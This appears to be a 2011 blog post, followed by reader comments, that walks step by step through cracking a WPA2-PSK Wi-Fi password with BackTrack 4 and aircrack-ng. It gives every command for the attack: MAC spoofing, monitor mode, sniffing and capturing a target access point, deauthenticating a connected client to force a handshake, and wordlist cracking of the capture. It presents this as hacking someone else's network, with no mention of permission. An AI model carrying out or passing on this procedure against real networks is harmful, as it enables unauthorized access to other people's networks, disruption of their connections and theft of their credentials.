Aug 30, 2011

How to Hack WPA2 PSK (wireless)?

You are going to learn how to crack WPA2. I reccommend to download backtrack4, because it have the other hacking tools in big pack.
Download site:http://www.backtrack-linux.org/downloads/ 


Just follow these step to learn it.

Step 1.
Start with see your wireless interface by typing iwconfig
Step 2.
Change your wireless mac address by typing macchange -r wlan0
Step 3.
Make monitor interface by typing airmon-ng start wlan0. After your make a monitor interface com mon0 interface.
Step 4.
Start sniffing wireless on your area by typing airodump-ng mon0 (remember to use your monitor interface).
[Image: startmonitor.png]

[Image: airodumpstart.png]
Code:
1. The access point mac address you want to hack.
2. The client who is connected to that access point you ar going to hack, remember only if they are next to each other with Access point and the client.
3. Wich channel is the Access Ponit.
4. wich Encryption.
5. Access point SSID name.
6. How many packets did you recieve? Remember, if you can see who is sending most packets, choose the client who is sending most packets.
After you decided to starting to hack this Access point and with this client, then you can go to the next step.

Step 5.
Open a new shell, start to listen to client who is on the access ponit and make the .cap file by typing airodump-ng -w wpa -c 1 --bssid 68:7f:74:11:15:62 mon0.
[Image: clientairodump.png]

Step 6.
Then you can see there is no handshake, but you are going to make handshake by making directed DeAuth, open a new Shell again type aireplay-ng -0 5 -a 68:7f:74:11:15:62 -c 00:25:d3:5f:43:ef mon0. If didn't work, try it again the step 6.
[Image: nothandshake.png]

[Image: handshake.png]
You can see we have Handshaked now, now can we begin with cracking the password. You can see on the top of right site.

Step 7.
Open a new Shell and type aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 68:7f:74:11:15:62 wpa-01.cap, -w stands for your wordlist, -b is the access point mac addresse and wpa-01.cap is the file you saved in step 5.
[Image: startaircrack.png]

[Image: airrack.png]
After you waited and waited, you finally crack the password.

P.S: If you wan't to crack it faster use this link, then can you use your GPU to crack password's instead CPU.

Enjoy.


4 comments:

  1. helle dear i have a laptop wifi built in in laptop so how to hack wpa2 pck from laptop wifi please tell can i use this builtin wifi for black track 4 my laptop wireless is intel r pro wireless 3945ABG network connection tell me about this builtin wifi thanks bro

    ReplyDelete
  2. hi could u please teach me how to use backtrack4? i've download the file from the link given above (3.1G) and im not sure how to use it. is it i need to mount the image using daemon tool or? sorry im blunt in this...

    ReplyDelete
  3. its depends on your wordlists...or dictionary because there is different type of passwords according to your country....unless u make ur own dictionary based on your country language and logical commonly passwords used by peoples...

    ReplyDelete